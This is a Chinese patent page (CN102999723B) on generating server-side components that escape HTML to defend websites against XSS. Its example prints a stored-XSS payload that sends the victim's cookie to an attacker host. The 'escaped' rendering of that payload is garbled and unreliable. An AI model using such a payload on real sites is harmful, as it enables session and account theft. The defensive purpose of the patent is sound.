CN102999723B - 主动防御xss攻击的数据防御组件生成方法及其装置 - Google Patents

主动防御xss攻击的数据防御组件生成方法及其装置 Download PDF

Info

Publication number
CN102999723B
CN102999723B CN201210474382.2A CN201210474382A CN102999723B CN 102999723 B CN102999723 B CN 102999723B CN 201210474382 A CN201210474382 A CN 201210474382A CN 102999723 B CN102999723 B CN 102999723B
Authority
CN
China
Prior art keywords
defence
code
compiler
data
module
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Expired - Fee Related
Application number
CN201210474382.2A
Other languages
English (en)
Other versions
CN102999723A (zh
Inventor
杨昕
葛亮
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Baizhuo Network Technology Co ltd
Original Assignee
Focus Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Focus Technology Co Ltd filed Critical Focus Technology Co Ltd
Priority to CN201210474382.2A priority Critical patent/CN102999723B/zh
Publication of CN102999723A publication Critical patent/CN102999723A/zh
Application granted granted Critical
Publication of CN102999723B publication Critical patent/CN102999723B/zh
Expired - Fee Related legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Landscapes

  • Management, Administration, Business Operations System, And Electronic Commerce (AREA)
  • Computer And Data Communications (AREA)

Abstract

本发明公开了一种主动防御XSS攻击的数据防御组件生成方法及其装置,方法包括形成简单数据传输对象并加入防御标识;定制防御编译器组件代码;将防御编译器组件代码插入到标准编译器组件序列;形成数据防御组件等步骤;本装置包括数据结构读取模块、防御代码标识模块、防御编译器、标准编译器、防御代码管理模块,其中数据结构读取模块、防御代码标识模块、防御编译器、标准编译器依次连接,防御代码管理模块与防御编译器连接;本发明能够对防御代码及时调整扩展,使网站快速、实时地应对不断变化的XSS攻击,通用性强,大大提升了网站的开发效率,提升了网站的安全性。

Description

主动防御XSS攻击的数据防御组件生成方法及其装置
技术领域
本发明属于网站安全领域,特别是一种主动防御XSS攻击的数据防御组件生成方法及其装置。
背景技术
在各种网站安全漏洞中,跨站脚本攻击(CrossSiteScript,即XSS攻击)是危害比较严重的。跨站脚本攻击是指攻击者在有漏洞的网站中插入恶意的可执行脚本(包含javascript,flash,css等)以欺骗用户执行。一旦用户浏览了此页面,嵌入其中的恶意脚本就会执行,攻击者通过这种方式达到恶意危害用户目的,如盗取各类用户帐号,控制企业数据,包括具有读取、篡改、添加、删除企业敏感数据的能力,盗窃企业重要的、具有商业价值的资料,非法转账,强制发送电子邮件,控制受害者机器向其它网站发起攻击等。
针对XSS攻击,目前提出了一些检测XSS攻击方法,在这方面有专利“一种检测数据库是否遭到跨站脚本攻击的方法及装置”(专利申请号:200910085040.X),通过捕获提交到数据库服务器的数据包,从中提出SQL语句,如果提出的SQL语句为包含修改数据库字段内容的语句,则判断此SQL语句中是否含有跨站脚本攻击行为,如果有则判定数据库被跨站脚本攻击,从而检测出数据库所遭受的XSS攻击。专利“应用遗传算法自动生成XSS跨站点脚本漏洞检测参数的方法”(专利申请号:201010242794.4),设计了一套检测参数集、编码解码策略和攻击参数数据库,以及XSS模拟攻击操作,使用遗传算法的交叉、变异、选择,通过模拟攻击操作的反馈结果和基因编码策略,不断生成新的父代和子代,循环执行算法直到达到预期的代数,通过这种方法自动生成有效的XSS攻击检测参数。
这2个专利提出的方法都是用于对XSS攻击的检测,而没有提出有效的针对XSS攻击的防御方法。
在防御XSS攻击方面,在这方面发表的主要文献有:在《计算机系统应用》2010年第19卷第2期发表的《客户端跨站脚本攻击的分层防御策略》,此文献提出的分层防御策略是建立在客户端,并且带有一个XSS信息数据库,首先将来自服务器端的数据接收到客户端浏览器后,不立即进行编译,而是把数据发送到一个分析模块,在此模块中,分层防御策略会使用4个层次的筛选对网页内容的安全性进行分析和比对,对其中存在安全风险网页,将把其IP地址发送到XSS信息数据库中保存,并同时通知用户,避免恶意Script代码的执行,从而保证用户安全。由于这种方法把分析模块和XSS信息数据库植入到本地计算机,因此需要时常保持对XSS数据库的更新,否则就不能有效防御新的XSS攻击,而且这种防御方式属于被动防御,XSS信息数据库更新时间差有可能导致XSS攻击得逞,不能主动进行防御。
对于大型网站来说,日访问量是相当大的,如果不能实现事先主动防御XSS攻击,而留在事后处理的话,对网站的访问者造成了潜在的威胁。
因此,对XSS攻击进行主动防御是非常必要的。
发明内容
本发明的目的在于提供一种能够主动防御,能够对防御代码及时调整扩展,使网站快速、实时地应对不断变化的XSS攻击,通用性强,大大提升了网站的开发效率,提升了网站的安全性的主动防御XSS攻击的数据防御组件生成方法及其装置。
实现本发明目的的技术解决方案为:
一种主动防御XSS攻击的数据防御组件生成方法,包括以下步骤:
步骤一:数据结构读取模块访问数据库服务器,读取网站的数据库表结构,形成简单数据传输对象,并用防御代码标识模块在简单数据传输对象中加入防御标识;
步骤二:用防御编译器定制防御编译器组件代码;
步骤三:将防御编译器组件代码插入到标准编译器组件序列;
步骤四:在标准编译器中进行编译,防御编译器组件会被执行,形成数据防御组件,其中包含有防御代码以及防御代码执行的触发条件,保存在数据传递器的防御配置子单元中。
步骤一包括以下具体步骤:
(1)通过数据结构读取模块,访问数据库服务器,读取网站的数据库表结构;
(2)利用代码生成组件,将读取的网站数据库表结构生成简单数据传输对象;
(3)防御代码标识模块自动选择类型为文本字符串的属性,加入防御标识;
其中,所述的代码生成组件是以插件的形式提供,用来形成表述的简单数据传输对象的代码;所述的简单数据传输对象本身通过代码的形成存在,用来映射网站的数据库表结构,其中包含数据部分和数据获取部分;所述防御标识是指在简单数据传输对象中的文本属性中加入能够为编译器所理解的标志,用以在编译程序时指定嵌入防御代码的位置。
步骤二包括以下具体步骤:
(1)编写防御代码,将编写好的防御代码存入到防御代码管理模块中,防御代码的作用是检测用户输入的内容中是否含有可执行脚本,如果有,就对这些可执行脚本代码进行转义处理,使其输出内容为单纯的普通字符串;
(2)编写防御代码触发条件,判断运行环境是否是渲染HTML状态,如果是渲染HTML状态,则执行预定义好的防御代码;
(3)防御编译器在简单数据传输对象中寻找防御标识,找到防御标识后,将防御编译器组件代码插入到数据获取方法中;其中防御编译器组件代码是指增强标准编译器的编译行为,可根据安全期望,独立定制的具有防御能力的最终执行程序的行为,包含有防御代码和防御代码触发条件;
一种数据防御组件生成器,包括数据结构读取模块、防御代码标识模块、防御编译器、标准编译器、防御代码管理模块,其中数据结构读取模块、防御代码标识模块、防御编译器、标准编译器依次连接,防御代码管理模块与防御编译器连接。
本发明与现有技术相比,其显著优点:
1、XSS攻击防御编码被植入到在数据实体的数据获取部分的可执行程序中,在页面进行渲染时,植入的防御代码会自动执行,起到了服务器主动防御的作用。
2、扩展性强。方便增加新的防御标识,从而增加与之对应的新防御代码,有利于防御方法的调整扩展。
3、通用性强,这种防御XSS攻击方法与业务处理程序是相互独立的,可以方便应用到各种第三方网站中,与研发所使用语言以及工具无关。
4、无需编码人员对网站每个页面进行防御处理,也无需测试人员每次对防御处理编码进行测试,减少了人工处理可能出错或者是偶尔缺漏的风险,提升了网站的开发效率,减少人员的投入,提升网站的安全性。
下面结合附图对本发明作进一步详细描述。
附图说明
图1为本发明方法的流程图。
图2为本发明数据防御组件生成器的结构示意图。
图3为不进行XSS攻击防御处理。
图4为进行XSS攻击防御处理。
图5为数据实体的组成示意图。
图6为服务器主动防御XSS攻击的过程结构示意图。。
具体实施方式
如图1和图2所示,本发明一种主动防御XSS攻击的数据防御组件生成方法,包括以下步骤:
步骤一:数据结构读取模块访问数据库服务器,读取网站的数据库表结构,形成简单数据传输对象,并用防御代码标识模块在简单数据传输对象中加入防御标识;
步骤二:用防御编译器定制防御编译器组件代码;
步骤三:将防御编译器组件代码插入到标准编译器组件序列;
步骤四:在标准编译器中进行编译,防御编译器组件会被执行,形成数据防御组件,其中包含有防御代码以及防御代码执行的触发条件,保存在数据传递器的防御配置子单元中。
步骤一包括以下具体步骤:
(1)通过数据结构读取模块,访问数据库服务器,读取网站的数据库表结构;
(2)利用代码生成组件,将读取的网站数据库表结构生成简单数据传输对象;
(3)防御代码标识模块自动选择类型为文本字符串的属性,加入防御标识;
其中,所述的代码生成组件是以插件的形式提供,用来形成表述的简单数据传输对象的代码;所述的简单数据传输对象本身通过代码的形成存在,用来映射网站的数据库表结构,其中包含数据部分和数据获取部分;所述防御标识是指在简单数据传输对象中的文本属性中加入能够为编译器所理解的标志,用以在编译程序时指定嵌入防御代码的位置。
步骤二包括以下具体步骤:
(1)编写防御代码,将编写好的防御代码存入到防御代码管理模块中,防御代码的作用是检测用户输入的内容中是否含有可执行脚本,如果有,就对这些可执行脚本代码进行转义处理,使其输出内容为单纯的普通字符串;
(2)编写防御代码触发条件,判断运行环境是否是渲染HTML状态,如果是渲染HTML状态,则执行预定义好的防御代码;
(3)防御编译器在简单数据传输对象中寻找防御标识,找到防御标识后,将防御编译器组件代码插入到数据获取方法中;其中防御编译器组件代码是指增强标准编译器的编译行为,根据安全期望,独立定制的具有防御能力的最终执行程序的行为,包含有防御代码和防御代码触发条件;
本发明一种数据防御组件生成器,包括数据结构读取模块、防御代码标识模块、防御编译器、标准编译器、防御代码管理模块,其中数据结构读取模块、防御代码标识模块、防御编译器、标准编译器依次连接,防御代码管理模块与防御编译器连接。
本发明的方法实现步骤如下:
步骤一:访问数据库服务器,读取网站的数据库表结构,形成简单数据传输对象(SimpleDataTransferObject),并在简单数据传输对象中加入防御标识。
(1)通过数据结构读取模块,访问数据库服务器,读取网站的数据库表结构;
(2)利用代码生成组件,将读取的网站的数据库表结构生成简单数据传输对象;
所述代码生成组件以独立插件的形式提供,用来形成表述的简单数据传输对象的代码。所述简单数据传输对象本身通过代码的形式存在,用来映射网站的数据库表结构。
(3)本方法采用的安全策略:数据库表定义中的存储文本字符串的全部字段都需要进行XSS攻击防御处理。由于简单数据传输对象中的任何一个属性都对应数据库表中的一个字段,标识器自动选择类型为文本字符串的属性,加入防御标识。
所述防御标识是指在简单数据传输对象中的特定属性加入能够为编译器所理解的特定标志,用以在编译程序时指定嵌入防御代码的位置。
步骤二:定制防御编译器组件。
(1)编写防御代码,并把防御代码保存在防御代码管理器中。防御代码的功能:检测用户输入的内容中是否含有可执行脚本,如果有,就对这些可执行脚本代码进行转义处理,使其输出内容为单纯的普通字符串。
例如,网页显示过程中,HTML中一些字符(如<,>,&等)包含有特殊含义,一般是不会直接在页面上显示的,它们会被客户端浏览器作为javascript脚本来执行,或者是作为HTML标签来进行显示处理。
要想在浏览器中展示出文本内容“<br>”,就需要按照下列字符列表进行转义处理。
HTML特殊转义字符列表
显示 说明 实体名称 实体编号
半方大的空白 &ensp; &#8194;
全方大的空白 &emsp; &#8195;
不断行的空白格 &nbsp; &#160;
< 小于 < &#60;
> 大于 > &#62;
& &符号 & &#38;
" 双引号 " &#34;
? 版权 &copy; &#169;
? 已注册商标 &reg; &#174;
? 商标(美国) ? &#8482;
× 乘号 &times; &#215;
÷ 除号 &divide; &#247;
如果直接HTML代码中输入“<br>”,则会被客户端浏览器认为是换行符号,作为换行显示。因此必须将“<br>”转义处理,转换成“<br>”后,浏览器就会识别出转义符号,展示出“<br>”的文本内容,而不是作为换行显示。
本方法防御代码执行,就是将所有的特殊含义的字符全部参照转义序列进行转义,从而在浏览器中显示所需要的单纯的文本内容。
(2)防御编译器开始在简单数据传输对象中寻找防御标识,找到防御标识后,将如下防御编译器组件代码插入到简单传输对象的数据获取方法中,此组件代码包含有防御代码的触发条件:数据实体判断运行环境是否是渲染HTML状态,如果是渲染HTML状态,则执行预定义好的防御代码。
所述数据实体,对应数据库表中的数据记录。
(3)根据(2)中的行为,在防御编译器中形成防御编译器组件。通过MAVEN2的aspectj组件配置防御编译器组件。
所述防御编译器组件,是指增强标准编译器的编译行为,根据安全期望,独立定制的具有防御能力的最终执行程序的行为,包含有防御代码和防御代码触发条件;
步骤三:将防御编译器组件插入到标准编译器组件序列。
步骤四:在标准编译器中进行编译,防御编译器组件会被执行,形成数据防御组件,其中包含有防御代码以及防御代码执行的触发条件,保存在数据传递器的防御配置子单元中。
如图6所示,服务器主动防御XSS攻击的过程结构示意图。包括数据库服务器、网站服务器、组件专用工作站。这三者两两相连。
数据库服务器,用于保存网站服务器的所有数据。
组件专用工作站,用于生成各类组件,其中数据防御组件生成器在组件专用工作站上运行。
数据防御组件生成器,用于从数据库服务器读取网站数据库的库表结构,形成简单数据传输对象,并给简单数据传输对象加入防御标识,植入防御代码,编译后,数据防御组件,作为防御配置保存。
网站服务器,用于实现网站中的各项功能。其中数据传递器、业务逻辑处理器、页面渲染器都在网站服务器上运行。数据传递器、业务逻辑处理器、页面渲染器依次连接。
数据传递器,用于读取数据库服务器中的网站数据记录,把数据记录转换成数据实体,并根据防御配置,将数据实体内部具有防御标识的数据获取方法中植入防御代码。
业务逻辑处理器,用于对数据实体中的数据进行业务计算、处理。
页面渲染器,用于读取经过业务逻辑处理器业务处理、计算后的数据实体,进行页面显示处理。
本方法对XSS攻击的防御流程如下:
步骤一:数据传递器访问数据库服务器,读取数据库中的数据记录,并把所读取的数据记录转换成数据实体。数据实体分为3部分(如图5所示):数据部分、数据获取部分、状态判断部分。其中状态判断部分主要用于判断2种状态:业务处理状态、数据渲染状态。
步骤二:找到与简单传输对象中防御标识对应的数据实体的数据,在其对应的数据获取部分附加上XSS攻击防御代码。
步骤三:包含有XSS攻击防御代码的数据实体由数据传递器传送到业务逻辑器,数据实体中的状态判断器先判断业务逻辑器的状态,为业务处理状态,在这种状态下,不进行XSS攻击防御处理,数据实体的数据获取部分直接读取数据实体中数据部分的数据,在业务逻辑器内进行相关的业务处理、计算,经过业务处理和计算的相关结果要重新写入数据实体中的数据部分。
步骤四:经过业务处理、计算的数据实体,被传送到页面渲染器,进行XSS攻击防御处理。
(1)页面渲染器的接收器接收到经过业务处理、计算后的数据实体。
(2)数据实体中的状态判断部分先判断页面渲染器的状态,为数据渲染状态。
(3)在这种状态下,数据实体的数据获取部分读取数据部分的数据过程中,满足了防御代码的触发条件,进行XSS攻击防御处理,执行在数据实体的数据获取部分中植入的防御代码。
(4)将数据实体的对应数据通过转义处理,变换成单纯的普通字符串。
(5)获得变换后的数据,进行页面渲染处理。
下面模拟一次对网站的XSS攻击以及防御实例:
在一个网站中,允许注册用户输入自己公司的公司介绍和产品介绍进行互联网推广,在这种情况下,很可能有恶意攻击者在公司介绍信息中或产品介绍信息中嵌入XSS攻击代码。
例如,在公司介绍中输入:
“1996年,本公司从南京起步,15年来始终秉承“为客户提供优质服务”的服务理念,始终以客户为中心,视客户为一起成长的亲密伙伴。既然承接了客户交付的信任,就一定不能辜负这份信任,帮助客户获得生意的成功。
<script>window.open('http://www.aabb.net/cookie.asp?msg='+document.cookie)</script>
如今,作为一家国内规模最大的民营企业,公司依然保持锐意进取、注重品质的态度,始终坚持自主开发,优化成本,强化人才战略和技术创新等举措来打造更优化的网络和标准化体系,为客户提供快速高效、便捷及时、安全可靠的服务体验,助力客户创造最大的价值。”
其中,
“<script>window.open('http://www.aabb.net/cookie.asp?msg='+document.cookie)</script>”是恶意攻击者嵌入在公司介绍内容中的XSS攻击代码,www.aabb.net是恶意攻击者制作的网站。
在没有防御的情况下
(1)当注册用户访问以上公司介绍内容时,这部分内容从数据库服务器中取出。
(2)在网站服务器上经过业务逻辑处理,并形成页面数据,并发送到客户端浏览器上。
(3)浏览器接收到页面数据,展示公司内容,同时执行了嵌入其中的XSS攻击代码,并打开一个新的浏览器窗口,进入到网站www.aabb.net。
在浏览器上的显示内容为:
“1996年,本公司从南京起步,15年来始终秉承“为客户提供优质服务”的服务理念,始终以客户为中心,视客户为一起成长的亲密伙伴。既然承接了客户交付的信任,就一定不能辜负这份信任,帮助客户获得生意的成功。
如今,作为一家国内规模最大的民营企业,公司依然保持锐意进取、注重品质的态度,始终坚持自主开发,优化成本,强化人才战略和技术创新等举措来打造更优化的网络和标准化体系,为客户提供快速高效、便捷及时、安全可靠的服务体验,助力客户创造最大的价值。”
(4)一旦这个XSS攻击代码被执行,将获取注册用户浏览器上的cookie信息。
(5)把这个cookie信息传送到恶意攻击者制作的网站www.aabb.net上。
(6)恶意攻击者获得了注册用户的cookie信息,从而得到注册用户的帐号和密码,就可以非法操作注册用户的信息,例如,盗取注册用户的信息,篡改注册用户的帐号信息、以注册用户的身份恶意提交信息等,从而对注册用户造成危害。
在服务器主动防御的情况下
(1)当注册用户访问以上公司介绍内容时,这部分内容从数据库服务器中取出。
(2)在网站服务器上形成数据实体,公司信息被保存在数据实体的数据部分,防御代码被植入到数据实体的数据获取部分。
(3)在经过业务逻辑处理后,要进行页面渲染时,防御代码被执行。把在公司信息中嵌入的XSS攻击代码:
“<script>window.open('http://www.aabb.net/cookie.asp?msg='+document.cookie)</script>”
转换成
“<script>window.open("http://dlgyi.rrvv.net/cookie.asp?msg="+document.cookie)</script>”
(4)经过变换之后,XSS攻击代码将会在浏览器中以单纯文本字符串的形式显示,不再具有危害。
在浏览器上的显示内容为:
“1996年,本公司从南京起步,15年来始终秉承“为客户提供优质服务”的服务理念,始终以客户为中心,视客户为一起成长的亲密伙伴。既然承接了客户交付的信任,就一定不能辜负这份信任,帮助客户获得生意的成功。
<script>window.open('http://www.aabb.net/cookie.asp?msg='+document.cookie)</script>
如今,作为一家国内规模最大的民营企业,公司依然保持锐意进取、注重品质的态度,始终坚持自主开发,优化成本,强化人才战略和技术创新等举措来打造更优化的网络和标准化体系,为客户提供快速高效、便捷及时、安全可靠的服务体验,助力客户创造最大的价值。”

Claims (2)

1.一种主动防御XSS攻击的数据防御组件生成方法,其特征在于,包括以下步骤:
步骤一:数据结构读取模块访问数据库服务器,读取网站的数据库表结构,形成简单数据传输对象,并用防御代码标识模块在简单数据传输对象中加入防御标识;具体步骤:
(1)通过数据结构读取模块,访问数据库服务器,读取网站的数据库表结构;
(2)利用代码生成组件,将读取的网站数据库表结构生成简单数据传输对象;
(3)防御代码标识模块自动选择类型为文本字符串的属性,加入防御标识;
其中,所述的代码生成组件是以插件的形式提供,用来形成表述的简单数据传输对象的代码;所述的简单数据传输对象本身通过代码的形成存在,用来映射网站的数据库表结构,其中包含数据部分和数据获取部分;所述防御标识是指在简单数据传输对象中的文本属性中加入能够为编译器所理解的标志,用以在编译程序时指定嵌入防御代码的位置;
步骤二:用防御编译器定制防御编译器组件代码;具体步骤:
(1)编写防御代码,将编写好的防御代码存入到防御代码管理模块中,防御代码的作用是检测用户输入的内容中是否含有可执行脚本,如果有,就对这些可执行脚本代码进行转义处理,使其输出内容为单纯的普通字符串;
(2)编写防御代码触发条件,判断运行环境是否是渲染HTML状态,如果是渲染HTML状态,则执行预定义好的防御代码;
(3)防御编译器在简单数据传输对象中寻找防御标识,找到防御标识后,将防御编译器组件代码插入到数据获取方法中;其中防御编译器组件代码是指增强标准编译器的编译行为,可根据安全期望,独立定制的具有防御能力的最终执行程序的行为,包含有防御代码和防御代码触发条件;
步骤三:将防御编译器组件代码插入到标准编译器组件序列;
步骤四:在标准编译器中进行编译,防御编译器组件会被执行,形成数据防御组件,其中包含有防御代码以及防御代码执行的触发条件,保存在数据传递器的防御配置子单元中。
2.一种数据防御组件生成器,其特征在于:包括数据结构读取模块、防御代码标识模块、防御编译器、标准编译器、防御代码管理模块,其中数据结构读取模块、防御代码标识模块、防御编译器、标准编译器依次连接,防御代码管理模块与防御编译器连接;数据结构读取模块访问数据库服务器,读取网站的数据库表结构,形成简单数据传输对象,并用防御代码标识模块在简单数据传输对象中加入防御标识;用防御编译器定制防御编译器组件代码;将防御编译器组件代码插入到标准编译器组件序列;在标准编译器中进行编译,防御编译器组件会被执行,形成数据防御组件,其中包含有防御代码以及防御代码执行的触发条件,保存在数据传递器的防御配置子单元中;将编写好的防御代码存入到防御代码管理模块。
CN201210474382.2A 2012-11-20 2012-11-20 主动防御xss攻击的数据防御组件生成方法及其装置 Expired - Fee Related CN102999723B (zh)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201210474382.2A CN102999723B (zh) 2012-11-20 2012-11-20 主动防御xss攻击的数据防御组件生成方法及其装置

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201210474382.2A CN102999723B (zh) 2012-11-20 2012-11-20 主动防御xss攻击的数据防御组件生成方法及其装置

Publications (2)

Publication Number Publication Date
CN102999723A CN102999723A (zh) 2013-03-27
CN102999723B true CN102999723B (zh) 2015-11-18

Family

ID=47928278

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201210474382.2A Expired - Fee Related CN102999723B (zh) 2012-11-20 2012-11-20 主动防御xss攻击的数据防御组件生成方法及其装置

Country Status (1)

Country Link
CN (1) CN102999723B (zh)

Families Citing this family (10)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103577188B (zh) * 2013-10-24 2016-11-16 北京奇虎科技有限公司 防御跨站脚本攻击的方法及装置
CN104601540B (zh) * 2014-12-05 2018-11-16 华为技术有限公司 一种跨站脚本XSS攻击防御方法及Web服务器
CN107423340A (zh) * 2017-05-05 2017-12-01 腾讯科技(深圳)有限公司 用于网页渲染的参数处理方法和装置
CN109218296B (zh) * 2018-08-29 2021-03-23 天津大学 基于改进csp策略的xss防御系统和方法
CN109886018B (zh) * 2019-01-25 2021-01-05 北京工业大学 一种基于遗传算法的存储型xss攻击向量优化方法
CN111752570A (zh) * 2020-06-29 2020-10-09 重庆小雨点小额贷款有限公司 一种编译方法、装置、终端及计算机可读存储介质
CN112883391B (zh) * 2021-02-19 2022-10-14 广州橙行智动汽车科技有限公司 数据保护方法、装置以及电子设备
CN113364815B (zh) * 2021-08-11 2021-11-23 飞狐信息技术(天津)有限公司 一种跨站脚本漏洞攻击防御方法及装置
CN113810418B (zh) * 2021-09-18 2023-12-26 土巴兔集团股份有限公司 一种跨站脚本攻击的防御方法及其相关设备
CN114817804A (zh) * 2022-03-31 2022-07-29 北京达佳互联信息技术有限公司 一种网页生成方法、装置、电子设备及存储介质

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101192217A (zh) * 2006-11-28 2008-06-04 阿里巴巴公司 消除超文本标记语言中有害代码的方法
CN101217537A (zh) * 2007-12-28 2008-07-09 董韶瑜 一种网络攻击的防范方法
CN101964025A (zh) * 2009-07-23 2011-02-02 中联绿盟信息技术(北京)有限公司 Xss检测方法和设备

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US10375107B2 (en) * 2010-07-22 2019-08-06 International Business Machines Corporation Method and apparatus for dynamic content marking to facilitate context-aware output escaping

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101192217A (zh) * 2006-11-28 2008-06-04 阿里巴巴公司 消除超文本标记语言中有害代码的方法
CN101217537A (zh) * 2007-12-28 2008-07-09 董韶瑜 一种网络攻击的防范方法
CN101964025A (zh) * 2009-07-23 2011-02-02 中联绿盟信息技术(北京)有限公司 Xss检测方法和设备

Also Published As

Publication number Publication date
CN102999723A (zh) 2013-03-27

Similar Documents

Publication Publication Date Title
CN102999723B (zh) 主动防御xss攻击的数据防御组件生成方法及其装置
Jain et al. A novel approach to protect against phishing attacks at client side using auto-updated white-list
Hong et al. How you get shot in the back: A systematical study about cryptojacking in the real world
Gupta et al. PHP-sensor: a prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications
Gupta et al. Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network
CN103559235B (zh) 一种在线社交网络恶意网页检测识别方法
CN101356535B (zh) 一种检测和防止java脚本程序中不安全行为的方法和装置
US9858440B1 (en) Encoding of sensitive data
Van Acker et al. FlashOver: Automated discovery of cross-site scripting vulnerabilities in rich internet applications
Wang et al. Webranz: web page randomization for better advertisement delivery and web-bot prevention
CN105631355A (zh) 一种数据处理方法和装置
Taylor et al. Detecting malicious exploit kits using tree-based similarity searches
CN102110198A (zh) 一种网页防伪的方法
CN105959324A (zh) 基于正则匹配的网络攻击检测方法及装置
CN106549980A (zh) 一种恶意c&amp;c服务器确定方法及装置
CN104753730A (zh) 一种漏洞检测的方法及装置
Cui et al. A survey on xss attack detection and prevention in web applications
Roy et al. Generating phishing attacks using chatgpt
CN104580092A (zh) 对网络页面进行安全性检测的方法和装置
Mishra et al. Intelligent phishing detection system using similarity matching algorithms
Apruzzese et al. SpacePhish: the evasion-space of adversarial attacks against phishing website detectors using machine learning
CN105871775A (zh) 一种安全防护方法及dpma防护模型
Altamimi et al. PhishCatcher: Client-Side Defense Against Web Spoofing Attacks Using Machine Learning
CN103581321A (zh) 一种refer链的创建方法、装置及安全检测方法和客户端
Ro et al. Detection Method for Distributed Web‐Crawlers: A Long‐Tail Threshold Model

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
C14 Grant of patent or utility model
GR01 Patent grant
TR01 Transfer of patent right
TR01 Transfer of patent right

Effective date of registration: 20171127

Address after: Huidalu 210000 Jiangsu province Nanjing Jiangbei District No. 6 Beidou No. 2 building, building 70 room

Patentee after: BAIZHUO NETWORK TECHNOLOGY CO.,LTD.

Address before: 210061 Jiangsu 12 building, star fire road software building, Nanjing high tech Zone, Jiangsu

Patentee before: FOCUS TECHNOLOGY Co.,Ltd.

CF01 Termination of patent right due to non-payment of annual fee
CF01 Termination of patent right due to non-payment of annual fee

Granted publication date: 20151118